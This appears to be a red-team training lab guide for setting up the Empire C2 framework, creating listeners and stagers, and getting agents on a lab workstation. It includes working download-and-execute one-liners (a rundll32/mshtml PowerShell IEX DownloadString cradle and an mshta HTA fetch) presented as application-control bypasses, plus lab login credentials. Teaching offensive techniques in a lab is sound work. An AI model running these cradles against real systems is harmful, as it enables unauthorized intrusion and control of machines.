Lab 2: Empire Setup and Initial Agent

In this lab we will:

• spin up Empire

• connect to the Starkiller graphical user interface

• create a listener

• create a variety of stagers

• RDP into our entrypoint system

• execute a variety of stagers

• interact with an agent and perform some situational awareness

---

1. Make sure that you are connected to the openvpn file that was created when you deployed the lab environment. sudo openvpn student.ovpn Your VPN connection should say something along the lines of Initialization sequence completed. It is of crucial importance to NOT terminate this terminal session.

1. Now that you are connected to the VPN take note of your tun0 adapter IP address. (this should be in the 10.8.0.0/24 region, typically 10.8.0.2). You can find the IP by opening up a new terminal tab or window and typing ip addr show dev tun0

   

2. In this terminal window (or a seperate one, if you are forgetful about your IP), you can start your Empire server. Much like the VPN connection, this terminal session needs to remain active and should NOT be closed. You can start your Empire server by typing (you might need to change directories using the"cd" command to your empire location, such as /opt/Empire/ sudo ./ps-empire server Eventually you should see something along the lines of

   
3. Open a web browser and browse to the following URL: http://localhost:1337/index.html#/, you will be greeted by the starkiller interface 😄

   
4. You can login to starkiller using the following credentials: Username: empireadmin Password: password123

5. Once logged on, you are conveniently dropped on the listener page. Please create a new listener by clicking on the orange create button on the top right.

   
6. Although you could create an HTTPS listener in Empire, for this workshop, we will be going with plain HTTP instead to reduce overhead. We cover HTTPS listeners in SEC565 🥁. When you clicked the create button, a new window will appear selecting the type of listener that you want, go ahead and select "http" from the dropdown list.
7. A new window appears allowing you to specify all kinds of details for your listener. Give your listener an appropriate name such as workshop-http-listener

8. In the Host field, replace the IP address with the IP address of your tun0 interface

9. Although port 80 is appropriate, you might already have something running on that port, so we will be picking port 8000 for this workshop.

   
10. After inserting all these values, press the orange submit button on the top right.

11. After creating a listener, we need a payload associated with it. This is typically called a "stager". In Starkiller you have two ways to create a stager, either on the of Starkiller or on the side. We will be using the sidebar approach

1. When you click on the stager button a new window will open, on the top you will see a new orange create button. Click it.

2. In the dropdown, you have a variety of cool options to weaponize a payload. For now, we will be sticking to the multi/launcher

3. Give the launcher an appropriate name such as workshop-launcher

4. Select the listener you created from the dropdown list (you should only have one option).

1. Press the orange submit button on the top right

In a real engagement you obviously need to get initial access through social engineering or exploitation. In this workshop we assume breach and are provided regular domain user credentials.

1. Some green buttons will be added to your top navigation after you click submit. We will be needing those in a moment 👍. First, open a new terminal tab or window and RDP into our entry point of our environment using xfreerdp, if xfreerdp is not installed on your system yet you can install it by opening a terminal window and typing sudo apt install freerdp2-x11 -y xfreerdp /v:10.0.10.20 /u:jross /p:'0nz2xQ44GumoWpl' +clipboard
2. Back in your Empire web UI, go ahead and click the green paperclip button
3. Open up PowerShell in your rdp session and right click in the PowerShell prompt to copy your stager over and press enter to execute it

   
4. In Starkiller you should now see a new agent after you navigate to the chainlink icon on the left hand side, click on the agent name to interact with it.

   
5. We can now interact with our agent and execute shell commands or execute post exploitation tasks bundled with Empire. A nice task to run is some situational awareness like checking for any interesting processes using a third party tool called "SeatBelt" (ironically, our empire stager should be the only interesting process that will be returned). In the agent interaction window click on the dropdown and type seat, a suggestion will pop up showing the built-in seatbelt module. Click it.

1. After clicking on the seatbelt suggested module, some new options appear and a warning that this module is not OPSEC safe as Empire due to how Empire deals with C#. We get a new dropdown window with the command that we want to execute. We could go for -group=all but that takes a while to execute (feel free to do so though, just be patient while SeatBelt is doing its thing). For this particular exercise we'll stick to InterestingProcesses instead. After selecting it, click the submit button.

1. Navigate to the tasks tab to see the output of your previously executed task. Click on the dropdown button to see the output results.

A familiar process seems to be executing ... 😄

---

If you have time left, we can also launch some additional agents using a popular technique by adversaries, which is using Living off the Land Binaries and Scripts (LOLBAS). These binaries are present on your system by default and often carry the Microsoft signature which means they likely bypass controls like application control (applocker / wdac for instance).

1. Open up a new terminal window and create a staging directory - do not close the terminal window, we need it in a second. mkdir staging cd staging

2. In Empire, navigate back to your stagers and click on the three dots, and then copy to clipboard.

1. back in your terminal window use your favorite text editor (nano!) to create a new file and call it stager.ps1. For this workshop (and not to break the internet, I will be using gedit). gedit stager.ps1

copy paste your stager in the new document and save it.

1. Back in your terminal window, start a python server on port 6666 (for evil!), again, do not close the terminal window as we need to keep the staging server alive. python3 -m http.server 6666

1. Back in your RDP session to workstation01 (see step 18 if you closed your RDP session), open a command line prompt (NOT PowerShell). We will be using rundll32 (a crowd favorite), to pull our stager and launch another Empire agent. In the cmd window type the following hackerman command:

Replace the <your tun0 interface> in the command with the actual IP address!

rundll32.exe javascript:"..\mshtml.dll,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://<REPLACE BY YOUR TUN 0 ADAPTER IP >:6666/stager.ps1');")

Upon success, you will see that you will get a new hit on your python server, and a new agent in Empire!

1. For our final trick of this lab, let's create a new stager in HTA format. Click on the stager (suitcase) icon on the left hand side and click the orange create button.

   
2. Select windows_hta from the dropdown, give it a name and select your listener from the dropdown and click submit.

1. Click the paperclip icon again to copy the payload to your clipboard.

2. Navigate to your terminal where you are running the python server and stop it by pressing ctrl+c

3. let's create a new file and call it totallylegit.hta gedit totallylegit.hta

4. copy your hta payload in there and save the file.

5. start your python server again python3 -m http.server 6666

1. In your RDP session, invoke the following command from the cmd: mshta http://10.8.0.2:6666/totallylegit.hta

a new hit should appear on your python web server terminal window and a new Empire agent will check in!

This concludes our lab, feel free to keep messing around if you still have time left! 🎉